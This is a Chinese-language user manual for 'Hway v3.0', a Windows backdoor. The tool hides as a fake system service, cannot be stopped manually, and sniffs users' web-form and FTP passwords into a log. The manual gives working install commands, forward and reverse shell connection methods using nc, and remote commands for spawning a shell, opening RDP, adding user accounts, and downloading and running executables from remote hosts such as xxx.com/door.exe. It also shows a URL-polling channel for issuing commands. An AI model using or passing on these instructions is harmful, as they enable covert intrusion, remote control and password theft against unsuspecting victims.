Hway v3.0 by linx
luantan2005@163.com
--注册服务,利用svchost.exe启动(实现无启动项,无进程)+嗅探(实现无端口,并记录用户的POST数据和FTP密码)+线程保护 后门

创建服务Windows Infrared Port Monitor,利用hostsvc.exe启动.安装日志写在C:\WINDOWS\system32\hwaylogV3.txt.嗅探日志在C:\WINDOWS\system32\snifflogV3.log.
具有线程保护,不能手工停止Windows Infrared Port Monitor服务.除非卸载该服务.


hway.exe 为服务端,可改名.
client.exe 为专用客户端,可改名.
scan.exe 是一个多线程的端口扫描器.


最简单的用法:
安装
rundll32 hway.dll,install

反向连接:
client.exe IP 任意可以访问的端口 hway

卸载:
rundll32 hway.dll,uninstall


=================================
说明:

一.安装/卸载:

把hway.dll(可改名)复制到任意目录,

 运行:     rundll32 hway.dll,install [是否监听133端口:1=监听,0=不监听] [激活码,默认hway]
 例子:
    rundll32 hway.dll,install       默认安装,不打开133端口,激活码为hway
    rundll32 hway.dll,install  1 abc    安装,打开133端口,激活码为abc
    rundll32 hway.dll,install  0 abc    安装,不打开133端口,激活码为abc
 卸载  
    rundll32 hway.dll,uninstall         卸载,不用重启即可卸载完毕


如果安装后hway.dll被自动删除,则说明安装成功,反之请打开C:\WINDOWS\system32\hwaylogV3.txt查看安装失败的原因.

二.正向连接
1.使用rundll32 hway.dll,install (1)安装后的连接方法
方法1.telnet/nc IP 133,出现提示"p"(password)后输入激活码,便可连接
方法2.用client直接连接:client IP -133.
2.使用hway.exe -install安装,然后再让对方打开133端口
方法1.向服务器的任意端口发送activeString-o(eg:nc IP 80->回车->hway-o->回车),即可让服务器重新打开133端口.然后便可用正向连接的方法连接.


三.反向连接
用反向连接请先关闭自己的防火墙


方法1.client IP Port[=任意可以访问的端口] activeString (自动打开本机20082端口,然后向IP port发送activeString让服务器反向连接本机20082端口)

方法2.client IP auto activeString. (自动打开本机20082端口,扫描对方开放的端口,然后发送activeString ,实现反向连接)

方法3.先执行nc -lp 20082监听本机端口,然后向服务器的任意端口发送activeString -c(eg:nc IP 80->回车->activeString -c->回车).


可用命令:
sysinfo 查看服务器参数
pslist 查看服务器进程
pkill id 查杀服务器进程
Open3389 打开3389端口
shell 进入对方的cmd(而后可用exit退出cmd)
http://xxx.com/door.exe -c backdoor.exe 下载http://xxx.com/door.exe 到system32/backdoor.exe
cap 截图
download 下载c:\\boot.ini到本地(用专用客户端连接才可以传送文件)
upload c:\\abc.exe 上传文件到服务器c:\\abc.exe
close 关闭服务器上的133端口.关闭后建议再连接一次,以确定该端口已经关闭.(由于多线程的原因,要连续关闭两次)


四.卸载
运行rundll32 hway.dll,uninstall 即可,不用重启计算机.


四.提示
-winXP,win2000,win2003下测试通过.
-可以直接穿透winxp的防火墙访问默认打开的133端口.
-程序使用了防止异常的代码,一般不会运行错误.是一个相对稳定的后门.
-程序带嗅探功能,嗅探http表单post出去的密码和ftp密码,记录在system32/snifflog.log 下.
-用client连接后截图/传文件可能由于网络延迟而无回显,此时按几下回车即可.
-在正向,反向连接都不可用时(如两台机子都处于局域网),可以向服务器发送"hway-r-你的命令!"执行命令.
(eg:nc IP 80/139->回车->hway-r-cmd /c net user >c:\\net_user.txt&&cmd /c net start telnet!)
-发送hway-o可以打开服务器的133端口
-安装的服务名:Windows Infrared Port Monitor.
-程序未隐藏任何未公布的重大细节,不携带其他后门和病毒.
-查看嗅探到的数据包:type c:\windows\system32\snifflog.log



================
Tip:
rundll32 hway.dll,install   (安装服务,不直接打开133端口,适合用于服务器或高手的机子,但你必须确定你能访问到服务器的一个端口,eg:80/21/139)
或
rundll32 hway.dll,install 1(安装自动打开133端口,等待正向连接.但反向连接仍然可用.适合用于普通用户的机子,因为普通用户的机子可能一个端口都不会打开)


第四个隐藏的参数:
rundll32 hway.dll,install  0/1 activeString http://www.x.com/abc.php

安装时输入一个网址,后门便会每过半自动读取一次这个网址.你可以在网址上写入命令.
如:
hway-o (让服务器开133端口)
hway-r-cmd /c net user>c:\\log.txt&&cmd /c net user a /add! (让服务器执行命令cmd /c net user>c:\\log.txt&&cmd /c net user a /add)
hway-r-http://www.a.com/otherDoor.exe -c abc.exe! (让服务器下载http://www.a.com/otherDoor.exe到system32/abc.exe)

对未开任何端口/没固定IP的服务器 很有用.
============